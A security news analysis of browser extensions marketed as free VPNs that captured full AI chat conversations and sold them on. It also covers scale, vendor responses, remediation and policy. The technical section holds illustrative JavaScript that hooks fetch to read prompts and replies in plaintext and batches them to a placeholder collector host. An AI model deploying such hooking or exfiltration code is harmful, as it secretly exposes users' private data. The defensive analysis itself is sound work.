A family of popular browser extensions marketed as free VPNs and privacy tools secretly intercepted entire conversations with ChatGPT, Google Gemini, Anthropic Claude and several other AI chat services, then forwarded those chats to analytics servers and, according to researchers, to a data‑brokering affiliate. With a combined install base well over eight million, this ranks among the most consequential privacy incidents for consumer AI to date.
Source: Neowin https://www.neowin.net/amp/maliciou...gemini-conversations-of-over-8-million-users/
Background / Overview
Security researchers at Koi Security discovered that multiple extensions published by the same developer added stealthy, platform‑specific “executor” scripts to capture every message and response exchanged with major web‑based AI assistants. The behavior was introduced via an automatic update and enabled by default in version 5.5.0 of the largest extension, meaning most users who had the extension installed were opted in without an explicit, contextual consent flow. The affected extensions include Urban VPN Proxy (the flagship listing with the largest install count), 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker across the Chrome Web Store and Microsoft Edge Add‑ons catalogue. Koi’s telemetry and follow‑up reporting show the combined install base exceeds eight million, with Urban VPN Proxy alone showing multi‑million installs on Chrome and more than a million on Edge.

Koi’s technical write‑up — and multiple independent outlets reporting on it — details how the extensions injected per‑platform JavaScript files (for example chatgpt.js, gemini.js, claude.js) into pages hosting AI chats, overrode core browser networking APIs, captured prompts, replies, conversation identifiers and timestamps, and then exfiltrated that data to remote analytics endpoints controlled by the publisher. Those endpoints are named in the research and reporting as analytics.urban‑vpn[.]com and stats.urban‑vpn[.]com.

This is not a partial leak of metadata or a sampling pipeline — the researchers report full conversation capture (user prompts and model outputs), session metadata and model identifiers. That combination makes the incident especially damaging: it can expose personal health questions, financial disclosures, proprietary source code, internal corporate strategy and any secrets users treated as private in AI sessions.

How the interception worked — technical breakdown
The executor script model
- The extensions contained dedicated executor scripts for each targeted AI service. These scripts were designed to detect when a user opened an AI chat page, inject a content script into that page, and hook page internals to harvest text before it left the browser or after it arrived from the server (depending on the platform's DOM and JavaScript architecture).
- Key browser APIs were overridden in page context — notably fetch and XMLHttpRequest — so that requests and responses passed through the extension’s code first. That let the extension read the raw prompt text before transport encryption was applied, and the model’s output after it was decrypted, all in plaintext; a minimal sketch of this hooking pattern follows this list.
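Koi’s write‑up describes this hooking pattern but does not reprint the extensions’ source. The sketch below is a minimal, defanged illustration of how a script running in page context can wrap window.fetch so chat traffic passes through it in plaintext; the /conversation path filter and the report() helper are assumptions for illustration, not recovered code.

```js
// Minimal, defanged illustration of fetch hooking in page context.
// NOT the extensions' recovered source; the path filter and report() are assumptions.
function report(record) {
  // Stub for the exfiltration helper; a batching sketch appears later in this article.
  console.debug("captured", record);
}

const originalFetch = window.fetch;

window.fetch = async function (...args) {
  const response = await originalFetch.apply(this, args);
  try {
    const url = typeof args[0] === "string" ? args[0] : args[0].url;
    // Hypothetical filter: real code would match each platform's chat API path.
    if (url.includes("/conversation")) {
      const prompt = args[1] && args[1].body;      // the user's message, still plaintext
      const reply = await response.clone().text(); // the model's output, after TLS decryption
      report({ url, prompt, reply, ts: Date.now() });
    }
  } catch (e) {
    // Swallow errors so the page behaves normally and the hook stays invisible.
  }
  return response;
};
// XMLHttpRequest can be wrapped the same way by patching open() and send()
// on its prototype.
```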
What was collected
- Every user prompt (plain text).
- Full assistant responses (the model output).
- Conversation identifiers and timestamps.
- Session metadata that can include model or endpoint identifiers (e.g., which model was used or which tab initiated the session).
- Potentially other browsing state elements that make re‑identification easier (cookies, localStorage, or session IDs) depending on the extension’s permissions. An illustrative record combining these fields is sketched below.
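Taken together, each captured exchange plausibly serializes into a compact record along these lines. The field names and values below are illustrative assumptions, not the extensions’ actual schema:

```js
// Illustrative shape of a single harvested record; field names are assumptions,
// not the extensions' actual schema.
const capturedRecord = {
  platform: "chatgpt",       // set by the per-platform executor (chatgpt.js, gemini.js, ...)
  conversationId: "abc123",  // conversation identifier scraped from page state or API traffic
  model: "gpt-4o",           // model/endpoint identifier where the client exposes it
  prompt: "full plaintext of the user's message",
  response: "full plaintext of the assistant's reply",
  timestamp: 1721900000000,  // epoch milliseconds
  session: { tabId: 42 }     // extra browsing state, depending on granted permissions
};
```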
Exfiltration and downstream use
- Collected data was batched and shipped to analytics endpoints operated by the extension publisher (a minimal sketch of such a batching pipeline follows this list). Koi’s report traces this pipeline and identifies downstream sharing with a data‑broker affiliate (reported under the BiScience / B.I. Science family in multiple follow‑ups), which markets clickstream and advertising‑intelligence products. Independent researchers have previously documented the same broker’s involvement in similar extension ecosystems.
- The extension’s privacy policy — where it mentions “AI inputs and outputs” — reads as a legal disclosure of the pipeline, but researchers note the wording is buried and the harvesting was enabled automatically by an update, with no clear opt‑out shown to end users. That design effectively circumvented any meaningful informed consent.
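A batching loop of the kind the researchers describe takes only a few lines. This is a minimal sketch, assuming a periodic flush over navigator.sendBeacon; the cadence and transport are assumptions, and the collector URL is a non‑resolving placeholder rather than the real endpoint:

```js
// Illustrative batching/exfiltration loop; the 30-second cadence and the use of
// navigator.sendBeacon are assumptions, and the collector URL is a placeholder.
const queue = [];

function report(record) {
  queue.push(record);
}

setInterval(() => {
  if (queue.length === 0) return;
  // Drain the queue and serialize the batch in one shot.
  const batch = JSON.stringify(queue.splice(0, queue.length));
  // sendBeacon survives tab closes and is easy to miss in casual devtools inspection.
  navigator.sendBeacon("https://analytics.example.invalid/collect", batch);
}, 30_000);
```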
Scale, timing and affected platforms
- Primary timing: Researchers observed the harvesting behavior begin with a July 2025 update to the core extension (version 5.5.0), after which automatic updates propagated the new code to existing installs. Because Chrome and Edge auto‑update extensions by default, millions of profiles received the change without an explicit re‑approval step.
- Install counts reported by researchers and echoed in multiple outlets:
- Urban VPN Proxy: ~6,000,000 installs on Chrome Web Store and ~1,300,000 on Edge Add‑ons (aggregate counts vary slightly by source and timing).
- 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker: each in the hundreds of thousands of installs; combined, the family exceeds 8 million installs.
- Targeted AI platforms (platform coverage reported by researchers):
- ChatGPT (OpenAI)
- Gemini (Google)
- Claude (Anthropic)
- Microsoft Copilot
- Perplexity, xAI Grok and Meta AI
- Plus other web‑based assistants and aggregators whose front‑end DOM allowed script injection.
Vendor and platform responses (what’s known — and what isn’t)
- Multiple outlets repeated Koi Security’s findings within hours of disclosure and contacted platform vendors and store operators for comment. At the time the research was published, Google and Microsoft had been notified and the extensions were flagged in public reporting, but removal or takedown actions varied between stores and sources, and no widely published, attributed statement from Google or Microsoft confirmed a full takedown. The store status of each affected listing therefore requires a live check against the stores’ official dashboards; readers should not assume universal or immediate removal.
- Important policy angle: Google’s developer and API user‑data rules explicitly prohibit the transfer or sale of user data to data brokers and require transparency about data uses. If the behavior described by Koi and corroborated by multiple outlets is accurate, it would run counter to those platform policies; that mismatch explains why researchers framed the incident not just as a privacy lapse but as an enforcement failure worth regulatory attention.
- Caveat about attribution and downstream buyers: Koi’s analysis links the extension publisher to a known data‑broker family in the ecosystem; independent reporting draws the same connection. However, precise buyer lists, purchase receipts or contractual terms for the harvested AI chats are not publicly disclosed in forensic detail. Statements that specific third parties purchased a given conversation dataset should be treated as probable but not fully independently verified unless documents or confirmed buyer acknowledgements are published. Researchers and reporters have flagged these chains of custody and shared supporting artifacts, but ultimate proof of who used specific conversation data is harder to establish publicly.
Why this is unusually dangerous
- Full conversation capture is high‑fidelity: Unlike metadata leaks that reveal only who chatted or that an exchange occurred, this pipeline reportedly captured the content — prompts and responses — which is where secrets live. Users routinely include medical, legal, financial and proprietary code in AI chats. That makes the data directly monetizable and immediately dangerous in downstream hands.
- Cross‑platform breadth increases exposure: Because the executor model fingerprinted and targeted many major AI web interfaces, a single infected profile could leak chats across several services — increasing the chance that a user’s most sensitive data was included.
- Auto‑update propagation is the multiplier: Browser extension auto‑update mechanisms are designed for security fixes and feature delivery. Here, they enabled a mass opt‑in for a new data collection behavior without a forced re‑consent step, multiplying the blast radius overnight. This is a well‑known supply‑chain risk in extension ecosystems.
Practical, prioritized actions for users (what to do right now)
If you use any browser extension that matches the affected family (Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker) — or if you have any add‑on you don’t recognise — take these steps immediately:
- Uninstall the suspect extension(s) from every browser and profile on every device.
- Clear browser cookies and site data for AI sites you used while the extension was installed, and sign out of those services to force session invalidation.
- Revoke and rotate any credentials or API keys you may have pasted or shared in AI chats (for example, developer keys, tokens, or embedded secrets shown to an assistant).
- Change passwords for accounts mentioned in sensitive chats and enable multi‑factor authentication (MFA) where available.
- If you shared sensitive personal or health information, treat the leakage as a data breach: monitor accounts, place fraud alerts if appropriate, and follow institutional incident response if it involves work data.
- Consider deleting or limiting retained chat history inside the AI service and use the vendor’s data controls to opt out of training or long‑term retention where available. For consumer ChatGPT and Google Gemini, data‑control toggles and history deletion options exist; disable “Improve the model” or “Gemini Apps Activity” and delete retained activity as documented in vendor guidance.
What IT teams and enterprise administrators must do
- Immediately publish an advisory to employees and contractors to audit and remove the listed extensions from corporate devices. Assume that any staff who used AI chat tools in a browser profile with the extension present had those chats observed.
- Use enterprise extension controls to block or allow extensions centrally:
- Chrome Enterprise and Microsoft Intune / Group Policy let admins block specific extension IDs or force‑install only whitelisted extensions. Use these controls to block the Urban family extension IDs and any other suspect IDs.
- For Microsoft Edge, use the ExtensionInstallBlocklist and ExtensionInstallAllowlist policies to prevent re‑installation on managed machines. A complementary script‑based control is sketched after this list.
- Rotate and revoke any company secrets that may have been copied into AI chats, and treat the incident like a compromise: conduct a rapid scope analysis to identify users who had both the extension installed and who shared high‑value data with AI assistants. Consider legal notification obligations depending on sector and jurisdiction.
- Revisit policies for AI use in the company: disallow pasting production credentials into public or consumer AI chat windows; prefer managed enterprise LLM services with contractual data controls; and centralise AI usage to vetted clients or browser profiles with strict extension rules.
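In addition to the policy controls above, some teams deploy a force‑installed “guardian” extension that uses the chrome.management API to neutralize known‑bad extensions on managed profiles. A minimal sketch, assuming the extension’s manifest grants the management permission; the IDs below are placeholders, not the Urban family’s actual store IDs:

```js
// Sketch of a force-installed "guardian" extension (requires the "management"
// permission in its manifest). The IDs below are placeholders; substitute the
// real 32-character IDs from each store listing.
const BLOCKED = new Set([
  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
  "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb",
]);

chrome.management.getAll((extensions) => {
  for (const ext of extensions) {
    if (BLOCKED.has(ext.id) && ext.enabled) {
      // Disable in place; a full uninstall would prompt the user for confirmation.
      chrome.management.setEnabled(ext.id, false);
    }
  }
});
```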
Regulatory and policy implications
- Under platform rules: Google’s developer and user‑data policies forbid transferring or selling user data to data brokers except under narrow, disclosed exceptions. If corroborated, the reported extension behavior would represent a stark breach of Chrome Web Store policy and the spirit of limited‑use requirements. Platform enforcement — and whether the stores apply penalties beyond takedown (developer account suspension, refunds, or permanent bans) — is a separate but important question.
- Under privacy law: Selling or sharing raw chat contents containing personal data can trigger obligations under GDPR, CCPA and other data‑protection regimes (notifications, breach reporting, potential fines), especially if the data is identifiable or linked to other identifiers. Enterprises should assume regulated data may be implicated and consult legal counsel. Public authorities and regulators typically treat exfiltration of sensitive telemetry — including health or financial data — as a serious compliance incident.
- For store policy reform: This incident highlights weaknesses in extension review processes that rely on developer self‑disclosure. Better automated static and dynamic analysis of extension packaging, stricter enforcement of Limited Use clauses, clearer user‑facing consent, and a mandatory re‑consent screen after behavioral changes would reduce the likelihood of mass, silent opt‑ins. Several researchers have argued for stronger policy enforcement and technical controls for high‑privilege extension permissions; the current event strengthens that case.
Strengths and limitations of the public evidence
- Strengths:
- Multiple independent security outlets and researchers replicated core technical observations: per‑platform executor scripts, overridden fetch/XHR APIs, exfil endpoints and aggregated install counts. That reproducibility adds credibility to the central claims.
- The pattern (free extension marketed for privacy, update that enables broad telemetry, downstream sale to brokers) mirrors earlier, documented extension‑ecosystem abuses — meaning this is a recurring, empirically supported business model, not a one‑off scare.
- Limitations and cautions:
- Public reporting names analytics endpoints and an affiliated broker, but direct evidence of which third‑party clients purchased specific conversation logs is indirect; tracing buyers of harvested content in opaque data markets is difficult. These downstream commercial flows should be treated as likely and consistent with past patterns but not as fully proven until contractual receipts or buyer confirmations are shown.
- The exact number of actively compromised profiles that had the malicious update applied and actually exfiltrated chats is inherently fuzzy. Store install counts are a coarse proxy — they include inactive installs, synced devices, and profiles that may never have visited an AI site — so “eight million installs” denotes reach, not an exact headcount of exfiltrated conversations. Researchers and reporters note this nuance.
Broader takeaways: why AI privacy needs a new threat model
This incident reframes two core assumptions in consumer AI security:
- First, client‑side software (extensions, plug‑ins and browser helpers) can be the weakest link. Users often install privacy tools imagining they improve safety; here those tools betrayed that trust by capturing the most private content a user can produce: their unstructured conversations with assistants. Extension ecosystems must be treated as potential mass‑surveillance vectors rather than benign convenience layers.
- Second, end‑to‑end encryption of a service does not protect content that never reaches the encrypted channel in its intended form: if a script captures the plaintext in the browser before encryption or after decryption, the service’s transport security is irrelevant. Threat models for AI must include browser‑context attacks and extension privilege abuse.
Final verdict and recommendations
The Koi Security disclosure and corroborating reporting paint a persuasive and worrying picture: a set of high‑install browser extensions used widely for “privacy” and ad blocking harvested full AI conversations and pushed them into analytics pipelines that likely flowed into the commercial clickstream market. The core technical mechanisms — per‑site executor scripts, API hooking, and background exfiltration — are straightforward and well within the capabilities of a browser extension with broad permissions. Multiple independent outlets reproduced Koi’s high‑level findings, strengthening the case. What remains uncertain are the precise details of downstream purchasers and the full legal exposure for the publisher and any buyers; those are matters for forensic disclosure, regulator inquiries and, potentially, litigation. Until such authoritative disclosures appear, treat any specific claims about exactly who bought which chats as plausible but not incontrovertibly proven.

For WindowsForum readers and IT professionals, the immediate action is simple and urgent: audit installed extensions, uninstall anything suspicious (starting with the named Urban family extensions), rotate secrets, and treat any sensitive AI chat conducted in compromised profiles as exposed. For administrators: apply extension allowlists, force blocklists where necessary, and treat browser extension management as a first‑class endpoint security control.

This episode will be a test case for platform enforcement, for how privacy law applies to harvested chat content, and for the industry’s ability to harden browser extension ecosystems against monetization models built on secretly commoditized human conversations. The combination of AI convenience and browser extension privilege has created a new attack surface; addressing it will require technical fixes, policy enforcement and, most importantly, better user expectations and disclosure practices from store operators and extension publishers.

Source: Neowin https://www.neowin.net/amp/maliciou...gemini-conversations-of-over-8-million-users/
